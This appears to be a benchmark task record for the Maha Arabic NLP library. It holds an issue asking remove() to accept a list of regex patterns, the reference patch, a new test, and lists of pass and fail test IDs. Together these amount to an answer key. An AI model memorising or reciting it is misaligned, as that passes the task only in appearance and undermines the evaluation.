"transaction/tests/test__transaction.py::TransactionTests::test_verifyImplements_ITransaction",
"transaction/tests/test__transaction.py::TransactionTests::test_verifyProvides_ITransaction",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test___repr__",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_abort",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_abort_w_error",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_commit",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_ctor",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_sortKey",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_abort",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_begin",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_finish",
"transaction/tests/test__transaction.py::MultiObjectResourceAdapterTests::test_tpc_vote",
"transaction/tests/test__transaction.py::Test_rm_key::test_hit",
"transaction/tests/test__transaction.py::Test_rm_key::test_miss",
"transaction/tests/test__transaction.py::Test_object_hint::test_hit",
"transaction/tests/test__transaction.py::Test_object_hint::test_miss",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_nonstring",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_all_Fs",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_not_8_chars",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_xxx",
"transaction/tests/test__transaction.py::Test_oid_repr::test_as_string_z64",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_abort",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_commit",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_ctor",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_sortKey",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_abort",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_begin",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_finish",
"transaction/tests/test__transaction.py::DataManagerAdapterTests::test_tpc_vote",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_aware_resources",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_oblivious_resource_non_optimistic",
"transaction/tests/test__transaction.py::SavepointTests::test_ctor_w_savepoint_oblivious_resource_optimistic",
"transaction/tests/test__transaction.py::SavepointTests::test_rollback_w_sp_error",
"transaction/tests/test__transaction.py::SavepointTests::test_rollback_w_txn_None",
"transaction/tests/test__transaction.py::SavepointTests::test_valid_w_transacction",
"transaction/tests/test__transaction.py::SavepointTests::test_valid_wo_transacction",
"transaction/tests/test__transaction.py::AbortSavepointTests::test_ctor",
"transaction/tests/test__transaction.py::AbortSavepointTests::test_rollback",
"transaction/tests/test__transaction.py::NoRollbackSavepointTests::test_ctor",
"transaction/tests/test__transaction.py::NoRollbackSavepointTests::test_rollback",
"transaction/tests/test__transaction.py::MiscellaneousTests::test_BBB_join",
"transaction/tests/test__transaction.py::MiscellaneousTests::test_bug239086",
"transaction/tests/test__transaction.py::test_suite"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-11-11 17:20:00+00:00
|
zpl-2.1
| 6,395
|
|
TRoboto__Maha-103
|
diff --git a/maha/cleaners/functions/remove_fn.py b/maha/cleaners/functions/remove_fn.py
index 1385f34..47786b8 100644
--- a/maha/cleaners/functions/remove_fn.py
+++ b/maha/cleaners/functions/remove_fn.py
@@ -3,6 +3,8 @@ Functions that operate on a string and remove certain characters.
"""
from __future__ import annotations
+from maha.rexy import non_capturing_group
+
__all__ = [
"remove",
"remove_strings",
@@ -92,7 +94,7 @@ def remove(
emojis: bool = False,
use_space: bool = True,
custom_strings: list[str] | str | None = None,
- custom_expressions: ExpressionGroup | Expression | str | None = None,
+ custom_expressions: ExpressionGroup | Expression | list[str] | str | None = None,
):
"""Removes certain characters from the given text.
@@ -168,7 +170,7 @@ def remove(
for more information, by default True
custom_strings:
Include any other string(s), by default None
- custom_expressions: Union[:class:`~.ExpressionGroup`, :class:`~.Expression`, str]
+ custom_expressions:
Include any other regular expression expressions, by default None
Returns
@@ -213,11 +215,15 @@ def remove(
if isinstance(custom_strings, str):
custom_strings = [custom_strings]
+ chars_to_remove.extend(custom_strings)
+
+ # expressions to remove
if isinstance(custom_expressions, str):
custom_expressions = Expression(custom_expressions)
- chars_to_remove.extend(custom_strings)
- # expressions to remove
+ elif isinstance(custom_expressions, list):
+ custom_expressions = Expression(non_capturing_group(*custom_expressions))
+
expressions_to_remove = ExpressionGroup(custom_expressions)
# Since each argument has the same name as the corresponding constant
|
TRoboto/Maha
|
8908cd383ec4af6805be25bfe04ec3e4df6f7939
|
diff --git a/tests/cleaners/test_remove.py b/tests/cleaners/test_remove.py
index df184a8..071f5a6 100644
--- a/tests/cleaners/test_remove.py
+++ b/tests/cleaners/test_remove.py
@@ -823,3 +823,12 @@ def test_remove_arabic_letter_dots_with_edge_case(input: str, expected: str):
def test_remove_arabic_letter_dots_general(input: str, expected: str):
assert remove_arabic_letter_dots(input) == expected
+
+
+def test_remove_list_input(simple_text_input: str):
+ list_ = ["بِسْمِ", "the", "ال(?=ر)"]
+ processed_text = remove(text=simple_text_input, custom_expressions=list_)
+ assert (
+ processed_text
+ == "1. ،اللَّهِ رَّحْمَٰنِ رَّحِيمِ In name of Allah,Most Gracious, Most Merciful."
+ )
|
Adding a list of strings to cleaner functions
### What problem are you trying to solve?
Enhance the cleaner functions so they can take a list of strings as input when needed.
### Examples (if relevant)
```py
>>> from maha.cleaners.functions import remove
>>> text = "من اليوم سوف ينتقل صديقي منور من المدينة المنورة وعنوانه الجديد هو الرياض"
>>> remove(text, custom_expressions=[r"\bمن\b", r"\bعن\b"])
'اليوم سوف ينتقل صديقي منور المدينة المنورة وعنوانه الجديد هو الرياض'
```
### Definition of Done
- It must adhere to the coding style used in the defined cleaner functions.
- The implementation should cover most use cases.
- Adding tests
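
A minimal sketch of the approach the accepted patch takes, independent of Maha's internals: join the list of patterns into a single non-capturing alternation and remove everything in one pass. The `combine` helper below is illustrative only; in Maha itself this role is played by `maha.rexy.non_capturing_group`, and the leftover-whitespace handling is done inside `remove`:

```python
import re


def combine(patterns):
    # Join several expressions into one non-capturing group: (?:a|b|c)
    return "(?:" + "|".join(patterns) + ")"


text = "من اليوم سوف ينتقل صديقي منور من المدينة المنورة وعنوانه الجديد هو الرياض"
expressions = [r"\bمن\b", r"\bعن\b"]

cleaned = re.sub(combine(expressions), "", text)
cleaned = re.sub(r"\s+", " ", cleaned).strip()  # collapse the spaces left behind
print(cleaned)  # اليوم سوف ينتقل صديقي منور المدينة المنورة وعنوانه الجديد هو الرياض
```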
|
0.0
|
8908cd383ec4af6805be25bfe04ec3e4df6f7939
|
[
"tests/cleaners/test_remove.py::test_remove_list_input"
] |
[
"tests/cleaners/test_remove.py::test_remove_with_arabic",
"tests/cleaners/test_remove.py::test_remove_with_english",
"tests/cleaners/test_remove.py::test_remove_english",
"tests/cleaners/test_remove.py::test_remove_with_false_use_space",
"tests/cleaners/test_remove.py::test_remove_with_random_true_inputs",
"tests/cleaners/test_remove.py::test_remove_with_arabic_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_small_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_capital_letters",
"tests/cleaners/test_remove.py::test_remove_with_english_capital_letters_false_use_space",
"tests/cleaners/test_remove.py::test_remove_with_numbers",
"tests/cleaners/test_remove.py::test_remove_numbers",
"tests/cleaners/test_remove.py::test_remove_with_harakat",
"tests/cleaners/test_remove.py::test_remove_harakat",
"tests/cleaners/test_remove.py::test_remove_all_harakat",
"tests/cleaners/test_remove.py::test_remove_with_punctuations",
"tests/cleaners/test_remove.py::test_remove_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_arabic_numbers",
"tests/cleaners/test_remove.py::test_remove_with_english_numbers",
"tests/cleaners/test_remove.py::test_remove_with_arabic_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_english_punctuations",
"tests/cleaners/test_remove.py::test_remove_with_custom_character",
"tests/cleaners/test_remove.py::test_remove_with_custom_characters_not_found[test]",
"tests/cleaners/test_remove.py::test_remove_with_custom_characters_not_found[strings1]",
"tests/cleaners/test_remove.py::test_remove_with_custom_patterns[[A-Za-z]]",
"tests/cleaners/test_remove.py::test_remove_with_tatweel",
"tests/cleaners/test_remove.py::test_remove_tatweel",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring_default",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring_raises_valueerror",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[h",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heheh",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647\\u0647-\\u0647\\u0647-3-2]",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heeellloooooooo-helo-2-1]",
"tests/cleaners/test_remove.py::test_reduce_repeated_substring[heeelloooooooo-hello-3-1]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u0648\\u0644\\u0642\\u062f",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0627\\u0644\\u0648\\u0631\\u062f",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u064a\\u0627",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u0623\\u0643\\u062b\\u0631",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[\\u064a\\u062c\\u0628",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[.#\\u0643\\u0631\\u0629",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[@#\\u0628\\u0631\\u0645\\u062c\\u0629-@#\\u0628\\u0631\\u0645\\u062c\\u0629]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#11111\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0645\\u0633\\u0623\\u0644\\u0629_\\u0631\\u0642\\u0645_1111-\\u0645\\u0633\\u0623\\u0644\\u0629_\\u0631\\u0642\\u0645_1111]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#Hello-Hello]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0645\\u0631\\u062d\\u0628\\u0627-\\u0645\\u0631\\u062d\\u0628\\u0627]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[&#\\u0631\\u0645\\u0636\\u0627\\u0646-&#\\u0631\\u0645\\u0636\\u0627\\u0646]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[_#\\u0627\\u0644\\u0639\\u064a\\u062f-_#\\u0627\\u0644\\u0639\\u064a\\u062f]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[^#\\u0627\\u0644\\u062a\\u0639\\u0644\\u064a\\u0645_\\u0644\\u0644\\u062c\\u0645\\u064a\\u0639-^\\u0627\\u0644\\u062a\\u0639\\u0644\\u064a\\u0645_\\u0644\\u0644\\u062c\\u0645\\u064a\\u0639]",
"tests/cleaners/test_remove.py::test_remove_hash_keep_tag[:#\\u0627\\u0644\\u0631\\u064a\\u0627\\u0636\\u0629-:\\u0627\\u0644\\u0631\\u064a\\u0627\\u0636\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_ligtures",
"tests/cleaners/test_remove.py::test_remove_with_hashtags_simple",
"tests/cleaners/test_remove.py::test_remove_with_hashtags_with_arabic",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#test-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[test",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#123-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_#\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&#\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[11111#\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111#\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[.#Good-.]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[@#test-@#test]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_hashtags[AB#CD-AB#CD]",
"tests/cleaners/test_remove.py::test_remove_hashtags",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#test-]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642-#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642]",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[test",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_english_hashtag[#123-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#test-#test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[test",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#hashtag",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#hashtag_start",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0647\\u0627\\u0634\\u062a\\u0627\\u0642hashtag",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#123-#123]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_hashtag[#\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@test-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[email@web.com-email@web.com]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@123-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@mention",
"tests/cleaners/test_remove.py::test_remove_with_mentions[_@\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629-_@\\u062c\\u0645\\u0639\\u0629_\\u0645\\u0628\\u0627\\u0631\\u0643\\u0629]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[&@\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645-&@\\u0645\\u0633\\u0627\\u0628\\u0642\\u0629_\\u0627\\u0644\\u0642\\u0631\\u0622\\u0646_\\u0627\\u0644\\u0643\\u0631\\u064a\\u0645]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[11111@\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647-11111@\\u0631\\u0633\\u0648\\u0644_\\u0627\\u0644\\u0644\\u0647]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[.@Good-.]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[@\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[AB@CD-AB@CD]",
"tests/cleaners/test_remove.py::test_remove_with_mentions[#@test-#@test]",
"tests/cleaners/test_remove.py::test_remove_mentions",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@test-]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0645\\u0646\\u0634\\u0646-@\\u0645\\u0646\\u0634\\u0646]",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@mention",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_english_mentions[@123-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@test-@test]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0645\\u0646\\u0634\\u0646-]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[email@web.com-email@web.com]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[test",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[\\u062a\\u062c\\u0631\\u0628\\u0629",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@mention_start",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0645\\u0646\\u0634\\u0646",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0647\\u0627\\u064a\\u0634\\u062a\\u0627\\u0642mention",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[\\u0641\\u064a",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@123-@123]",
"tests/cleaners/test_remove.py::test_remove_with_arabic_mentions[@\\u0644\\u064f\\u0642\\u0650\\u0651\\u0628-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_emails[@test-@test]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web.com-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email123-d@web-1.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web.co.uk-]",
"tests/cleaners/test_remove.py::test_remove_with_emails[email@web-email@web]",
"tests/cleaners/test_remove.py::test_remove_emails",
"tests/cleaners/test_remove.py::test_remove_with_links[test-test]",
"tests/cleaners/test_remove.py::test_remove_with_links[.test.-.test.]",
"tests/cleaners/test_remove.py::test_remove_with_links[web.com-]",
"tests/cleaners/test_remove.py::test_remove_with_links[web-1.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[web.co.uk-]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[http://web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[http://www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://www.web.edu.jo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[https://www.web.notwebsite.noo-]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.notwebsite.noo-www.web.notwebsite.noo]",
"tests/cleaners/test_remove.py::test_remove_with_links[www.web.website.com-]",
"tests/cleaners/test_remove.py::test_remove_with_empty_string",
"tests/cleaners/test_remove.py::test_remove_links",
"tests/cleaners/test_remove.py::test_remove_should_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_with_random_input",
"tests/cleaners/test_remove.py::test_remove_with_emojis",
"tests/cleaners/test_remove.py::test_remove_strings[\\u0628\\u0650\\u0633\\u0652\\u0645\\u0650\\u0627\\u0644\\u0644\\u0651\\u064e\\u0647\\u0650",
"tests/cleaners/test_remove.py::test_remove_strings[1.",
"tests/cleaners/test_remove.py::test_remove_strings_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_patterns",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[--1]",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[",
"tests/cleaners/test_remove.py::test_remove_extra_spaces[test",
"tests/cleaners/test_remove.py::test_remove_extra_spaces_raise_valueerror",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0628-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062a-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062b-\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062c-\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u062e-\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0630-\\u062f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0632-\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0634-\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0636-\\u0635]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0638-\\u0637]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u063a-\\u0639]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0641-\\u06a1]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0642-\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0646-\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u064a-\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_individual_letters[\\u0629-\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0628\\u0627\\u0628-\\u066e\\u0627\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062a\\u0644-\\u066e\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062b\\u0631\\u0648\\u0629-\\u066e\\u0631\\u0648\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062c\\u0645\\u0644-\\u062d\\u0645\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u062e\\u0648-\\u062d\\u0648]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0630\\u0648\\u0642-\\u062f\\u0648\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0632\\u064a\\u0627\\u062f\\u0629-\\u0631\\u0649\\u0627\\u062f\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0634\\u0645\\u0633-\\u0633\\u0645\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0636\\u0648\\u0621-\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0638\\u0644\\u0627\\u0645-\\u0637\\u0644\\u0627\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u063a\\u064a\\u0645-\\u0639\\u0649\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0641\\u0648\\u0642-\\u06a1\\u0648\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0642\\u0644\\u0628-\\u066f\\u0644\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u0646\\u0648\\u0631-\\u066e\\u0648\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_begin[\\u064a\\u0648\\u0645-\\u0649\\u0648\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0631\\u0628\\u0648-\\u0631\\u066e\\u0648]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062a\\u0631-\\u0648\\u066e\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062b\\u0628-\\u0648\\u066e\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u062c\\u0644-\\u0648\\u062d\\u0644]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0645\\u062e\\u062f\\u0631-\\u0645\\u062d\\u062f\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0630\\u0631-\\u062d\\u062f\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0632\\u0631-\\u0648\\u0631\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0634\\u062f-\\u062d\\u0633\\u062f]",
